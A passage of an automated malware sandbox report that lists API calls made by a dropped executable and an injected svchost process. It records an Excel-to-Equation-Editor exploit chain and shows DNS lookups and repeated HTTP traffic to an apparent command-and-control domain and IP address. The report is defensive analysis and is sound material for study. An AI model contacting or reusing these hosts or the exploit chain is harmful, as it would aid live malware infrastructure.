          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D7C2A2 FindFirstFileExW,6_2_00D7C2A2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB68EE FindFirstFileW,FindClose,6_2_00DB68EE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00DB698F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00DAD076
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00DAD3A9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00DB9642
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00DB979D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00DB9B2B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB5C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00DB5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044E879 FindFirstFileExA,7_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040783C FindFirstFileW,FindNextFileW,7_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_10006580 FindFirstFileExA,7_2_10006580
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407C97
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560659 LoadLibraryW,2_2_03560659
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356084B CreateProcessW,ExitProcess,2_2_0356084B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035606B9 WriteFile,2_2_035606B9
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560622 CreateFileW,2_2_03560622
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560721 WriteFile,2_2_03560721
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035607AC WriteFile,CreateProcessW,ExitProcess,2_2_035607AC
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035605D6 CreateFileW,2_2_035605D6
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560752 WriteFile,2_2_03560752
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356057A ExitProcess,CreateFileW,2_2_0356057A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356076E WriteFile,CreateProcessW,ExitProcess,2_2_0356076E
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560792 WriteFile,CreateProcessW,ExitProcess,2_2_03560792
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560593 CreateFileW,2_2_03560593
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560887 ExitProcess,2_2_03560887
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560705 WriteFile,2_2_03560705
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356060F CreateFileW,2_2_0356060F
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356080D CreateProcessW,ExitProcess,2_2_0356080D
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035605AF CreateFileW,2_2_035605AF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356082A CreateProcessW,ExitProcess,2_2_0356082A
          Source: global trafficDNS query: name: yuahdgbceja.sytes.net
          Source: global trafficDNS query: name: geoplugin.net
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 178.237.33.50:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
